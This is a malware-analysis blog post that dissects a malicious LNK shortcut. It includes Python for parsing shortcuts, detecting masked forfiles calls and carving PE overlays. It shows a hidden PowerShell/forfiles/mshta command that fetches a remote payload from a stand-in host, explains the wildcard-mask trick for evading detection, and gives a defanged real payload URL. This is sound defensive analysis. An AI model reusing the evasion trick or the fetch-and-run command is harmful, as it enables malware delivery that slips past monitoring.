In this post, we will analyze how an LNK shortcut file can be used by threat actors for malicious purposes.
The sample comes from MalwareBazaar.
Let’s extract the shortcut to our desktop folder. Assuming the file does not have an odd name such as a hash, or a random icon as in my case, it is barely distinguishable from other files.
A person might try the Open file location option in the hope of finding its source, but that reveals nothing, because the LNK file points at a legitimate file in the System32 folder.
The file’s Properties are worth a look. In the case below, the target is PowerShell; obviously cmd would work just as well.
The Target field has no length limit defined in the shortcut itself, but the Properties dialog truncates what it displays. If the command is long, you will only see a clipped version of it.
Let’s use the file utility to check its type.
It’s worth noting the HideNormalShowMinimized at the end of the output: the ShowCommand field is set so that the window starts minimized, which keeps the console out of the victim’s sight.
We use LECmd (Eric Zimmerman’s Lnk Explorer) to parse the LNK file.
The relative path shows the file name that was displayed when we used Open file location.
The arguments show the actual command that will be executed.
We can also see the icon associated with the shortcut.
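The fields LECmd prints (ShowCommand, relative path, arguments, icon location) come straight from the MS-SHLLINK layout: a 76-byte header followed by optional structures and a fixed-order list of length-prefixed strings. The parser below is an added example, not the author’s tooling or LECmd; it builds a constructed shortcut modelled on the pattern in this post (the paths, URL and argument string are made up) and then reads it back, flagging the traits discussed here. The 260-character figure for the Properties dialog is an assumption.

```python
import struct
from typing import Any, Dict, List, Optional

# LinkFlags bits (MS-SHLLINK 2.1.1) that decide which optional structures follow the header.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
SW_SHOWNORMAL, SW_SHOWMAXIMIZED, SW_SHOWMINNOACTIVE = 1, 3, 7
# StringData entries appear in this fixed order, each present only if its flag is set.
STRING_FIELDS = (
    (HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"), (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"), (HAS_ICON_LOCATION, "icon_location"),
)


def build_lnk(fields: Dict[str, str], show_command: int = SW_SHOWNORMAL,
              id_list: Optional[bytes] = None) -> bytes:
    """Write a minimal Unicode .lnk: header, optional LinkTargetIDList, StringData."""
    flags = IS_UNICODE | (HAS_LINK_TARGET_ID_LIST if id_list is not None else 0)
    for bit, key in STRING_FIELDS:
        if fields.get(key) is not None:
            flags |= bit
    # HeaderSize, CLSID, LinkFlags, FileAttributes, 3 timestamps, FileSize, IconIndex,
    # ShowCommand, HotKey, Reserved1..3
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LINK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = b""
    if id_list is not None:
        body += struct.pack("<H", len(id_list)) + id_list   # IDListSize excludes its own 2 bytes
    for bit, key in STRING_FIELDS:
        if flags & bit:
            body += struct.pack("<H", len(fields[key])) + fields[key].encode("utf-16-le")
    return header + body


def parse_lnk(data: bytes) -> Dict[str, Any]:
    """Parse the header and StringData; skips LinkTargetIDList and LinkInfo when present."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LINK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]       # LinkInfoSize includes itself
    info: Dict[str, Any] = {"flags": flags, "show_command": show_command}
    for bit, key in STRING_FIELDS:
        if not flags & bit:
            info[key] = None
            continue
        count = struct.unpack_from("<H", data, pos)[0]      # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            info[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            info[key] = data[pos:pos + count].decode("cp1252", errors="replace")
            pos += count
    return info


def triage(info: Dict[str, Any]) -> List[str]:
    """Flag the shortcut traits this post calls out as suspicious."""
    findings = []
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window starts minimized (SW_SHOWMINNOACTIVE): console hidden from the user")
    args = info.get("arguments") or ""
    low = args.lower()
    if "forfiles" in low and "/m" in low and "*" in low:
        findings.append("forfiles with a wildcard /m mask: the real binary name never appears literally")
    if "mshta" in low or "://" in low:
        findings.append("remote content referenced from the arguments (mshta/URL)")
    # Assumption: the Properties dialog shows at most 260 characters of the target,
    # so a longer argument string is only fully visible to a parser like this one.
    if len(args) > 260:
        findings.append("arguments longer than 260 characters: clipped in the Properties dialog")
    return findings


# Constructed sample modelled on the pattern in the post; not the real sample's content.
SAMPLE_FIELDS = {
    "relative_path": "..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "arguments": '-w hidden -c "forfiles /p C:\\Windows\\System32 /m msh*a.exe '
                 '/c \\"@path https://example.invalid/x.json\\""',
    "icon_location": "%SystemRoot%\\System32\\shell32.dll",
}
SAMPLE_LNK = build_lnk(SAMPLE_FIELDS, show_command=SW_SHOWMINNOACTIVE)

if __name__ == "__main__":
    parsed = parse_lnk(SAMPLE_LNK)
    for key in ("show_command", "relative_path", "arguments", "icon_location"):
        print(f"{key:14}: {parsed[key]}")
    for finding in triage(parsed):
        print("!", finding)
```

Point the parser at a real file with `parse_lnk(open(path, "rb").read())`; the relative path is what Open file location follows, while the arguments hold what actually runs, which is why the two disagree on a malicious shortcut.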
If you look closely, you will notice that the names of the actual binaries are not written out but matched by wildcard, i.e., notep*.exe and msh*a. forfiles iterates the directory given with /p and runs the /c command for every file matching the /m mask.
Security analysts usually write detection queries that look for cmd or PowerShell in the command line; the adversary used forfiles with wildcard masks precisely to sidestep such queries. The same trick works with cm*.exe, powersh*.exe, or any other mask.
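To show the evasion concretely, here is an added example (not from the post or any particular SIEM) that runs a literal cmd/PowerShell rule and a mask-resolving rule over a few constructed process-creation command lines. The directory inventories are made-up stand-ins for a real System32 listing; the idea is to expand each forfiles /m mask against the files that actually exist in the /p directory and then compare the expansion against a LOLBin list.

```python
import fnmatch
import re
from typing import Callable, Dict, List, Set

# Constructed directory inventories standing in for a real host or golden image.
DIR_INVENTORY: Dict[str, List[str]] = {
    r"c:\windows\system32": ["calc.exe", "certutil.exe", "cmd.exe", "cscript.exe", "forfiles.exe",
                             "mshta.exe", "notepad.exe", "regsvr32.exe", "rundll32.exe", "wscript.exe"],
    r"c:\windows\temp": ["setup.log", "old.tmp"],
}
# Binaries worth alerting on when a shortcut or script reaches them.
LOLBINS = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe",
           "rundll32.exe", "regsvr32.exe", "certutil.exe"}

LITERAL_RE = re.compile(r"\b(cmd|powershell)(\.exe)?\b", re.I)     # what the naive query looks for
PATH_RE = re.compile(r'/p\s+"?([^"\s]+)"?', re.I)                  # forfiles /p <directory>
MASK_RE = re.compile(r'/m\s+"?([^"\s]+)"?', re.I)                  # forfiles /m <searchmask>

# Constructed process-creation events (command lines only); event 2 mirrors the post's trick.
EVENTS = [
    {"id": 1, "cmdline": 'cmd.exe /c powershell.exe -nop -w hidden -c "Start-Process x.json"'},
    {"id": 2, "cmdline": 'forfiles /p C:\\Windows\\System32 /m msh*a.exe '
                         '/c "@path https://example.invalid/CharcoalWharf.json"'},
    {"id": 3, "cmdline": 'forfiles /p C:\\Windows\\Temp /m *.log /d -7 /c "cmd /c del @path"'},
    {"id": 4, "cmdline": 'forfiles /p C:\\Windows\\System32 /m notep*.exe /c "@path"'},
]


def naive_hits(cmdline: str) -> Set[str]:
    """The usual rule: literal cmd / powershell anywhere in the command line."""
    return {m.group(1).lower() + ".exe" for m in LITERAL_RE.finditer(cmdline)}


def expand_masks(cmdline: str) -> Set[str]:
    """Resolve every forfiles /m mask against the inventory of the /p directory."""
    path_match = PATH_RE.search(cmdline)
    if path_match is None:
        return set()            # forfiles defaults to the current directory; unknown here
    directory = path_match.group(1).lower().rstrip("\\")
    listing = DIR_INVENTORY.get(directory, [])
    hits: Set[str] = set()
    for mask in MASK_RE.findall(cmdline):
        mask = mask.lower()
        hits.update(name for name in listing if fnmatch.fnmatchcase(name.lower(), mask))
    return hits


def improved_hits(cmdline: str) -> Set[str]:
    """Literal matches plus mask expansions that land on a LOLBin."""
    return naive_hits(cmdline) | (expand_masks(cmdline) & LOLBINS)


def run_rule(events: List[Dict[str, object]], rule: Callable[[str], Set[str]]) -> List[int]:
    """Return the ids of the events a rule fires on."""
    return sorted(e["id"] for e in events if rule(str(e["cmdline"])))


if __name__ == "__main__":
    print("naive   :", run_rule(EVENTS, naive_hits))
    print("improved:", run_rule(EVENTS, improved_hits))
    for event in EVENTS:
        print(event["id"], expand_masks(str(event["cmdline"])))
```

The literal rule fires on events 1 and 3 (the second of which is an ordinary log-cleanup job) and misses event 2 entirely; expanding `msh*a.exe` against the System32 listing turns it back into `mshta.exe`. Event 4 expands to `notepad.exe`, which is not on the LOLBin list, so resolving masks does not by itself make every forfiles invocation an alert.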
The mshta utility fetches and parses the file at a remote location, in this case
hxxps[://]ctu[.]timeless-tales[.]shop/api/uz/0912545164/CharcoalWharf[.]json
PowerShell then uses Start-Process to execute the parsed file, i.e., CharcoalWharf.json.
Let’s check the file type of the parsed file: CharcoalWharf.json is a PE file with an overlay.
We use the hash of the file to check whether it has ever been uploaded to VirusTotal; VirusTotal’s insights might help the further analysis.
At the time of writing, 33 engines detect the file as malicious.
Remember, a PE file carrying an overlay deserves examination. We use Didier Stevens’ pecheck.py to extract the overlay and separate it from the actual file.
python pecheck.py -g o -D CharcoalWharf.json > CharcoalWharf.json.overlay
python pecheck.py -g s -D CharcoalWharf.json > CharcoalWharf.json.strip
The first command extracts the overlay from the file.
The second command extracts the actual file without overlay.
Let’s check the file type of the stripped file using DIE (Detect It Easy).
We can repeat the same process and search the hash on VirusTotal for more intel.
At the time of writing, 18 engines detect the file as malicious.
Interestingly, the extracted overlay is itself a PE file with an overlay; we verified this with DIE.
On VirusTotal, this file is detected by 10 engines.
Let’s extract the overlay of the overlay file using the same utility.
python pecheck.py -g o -D CharcoalWharf.json.overlay > CharcoalWharf.json.overlay.overlay
DIE reports CharcoalWharf.json.overlay.overlay as a plain binary file.
The file had never been uploaded to VirusTotal; after we uploaded it, it was detected by only 1 vendor.
Opening the binary in Notepad++, the very first line identifies it as an HTA application. The file also contains the MZ magic bytes, the signature of an executable.
See you next time, dissecting another sample or coming up with an evasion technique. Until then, bye bye.
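The two pecheck.py runs above and the overlay-of-an-overlay are one loop: find where the last section’s raw data ends, cut there, and repeat while what is left still starts with MZ. The carver below is an added example, not pecheck.py and not the author’s procedure; it builds a constructed two-stage PE (a minimal PE32 whose overlay is another minimal PE whose overlay is a made-up HTA snippet) and peels it layer by layer, so the structure can be exercised offline without the real sample.

```python
import struct
from typing import Dict, List, Tuple

SECTION_HEADER_LEN = 40


def overlay_offset(data: bytes) -> int:
    """Offset where the overlay begins: the end of the last section's raw data (len(data) if none)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("no PE signature")
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size                      # section table follows the optional header
    end = table + SECTION_HEADER_LEN * num_sections       # headers-only image has no section data
    for i in range(num_sections):
        # SizeOfRawData and PointerToRawData sit at +16 and +20 inside each section header
        raw_size, raw_ptr = struct.unpack_from("<II", data, table + SECTION_HEADER_LEN * i + 16)
        end = max(end, raw_ptr + raw_size)
    return min(end, len(data))                            # a truncated file has no overlay


def split_overlay(data: bytes) -> Tuple[bytes, bytes]:
    """(stripped PE, overlay): what pecheck.py -g s and -g o give you."""
    off = overlay_offset(data)
    return data[:off], data[off:]


def carve_chain(data: bytes) -> List[Dict[str, bytes]]:
    """Peel overlays repeatedly until the overlay is empty or no longer a PE."""
    layers: List[Dict[str, bytes]] = []
    current = data
    while current[:2] == b"MZ":
        try:
            stripped, overlay = split_overlay(current)
        except ValueError:
            break
        layers.append({"stripped": stripped, "overlay": overlay})
        if not overlay:
            break
        current = overlay          # strictly shorter than the last layer, so the loop ends
    return layers


def build_pe(section_data: bytes, overlay: bytes = b"") -> bytes:
    """Constructed minimal PE32 image with one .text section; only used to exercise the carver."""
    e_lfanew, opt_size = 0x80, 0xE0
    dos = (b"MZ" + b"\x00" * 58 + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\x00")
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x0102)   # i386, 1 section
    optional = b"\x0b\x01" + b"\x00" * (opt_size - 2)                    # Magic PE32, rest zeroed
    table = e_lfanew + 24 + opt_size
    raw_ptr = (table + SECTION_HEADER_LEN + 0x1FF) & ~0x1FF               # FileAlignment 0x200
    sect = struct.pack("<8sIIIIIIHHI", b".text", len(section_data), 0x1000,
                       len(section_data), raw_ptr, 0, 0, 0, 0, 0x60000020)
    headers = (dos + b"PE\x00\x00" + coff + optional + sect).ljust(raw_ptr, b"\x00")
    return headers + section_data + overlay


# Constructed sample: outer PE -> overlay is inner PE -> overlay is an HTA-looking blob.
SAMPLE_HTA = b'<script language="VBScript">\' constructed placeholder\n</script>'
INNER = build_pe(b"inner-stage", overlay=SAMPLE_HTA)
OUTER = build_pe(b"outer-stage", overlay=INNER)

if __name__ == "__main__":
    for depth, layer in enumerate(carve_chain(OUTER)):
        kind = "PE" if layer["overlay"][:2] == b"MZ" else "non-PE blob"
        print(f"layer {depth}: stripped {len(layer['stripped'])} bytes, "
              f"overlay {len(layer['overlay'])} bytes ({kind})")
```

Replacing `OUTER` with the bytes of a real file gives the same `.strip` / `.overlay` pairs the post produced by hand; the last layer’s overlay is what DIE called a binary file and Notepad++ showed as HTA.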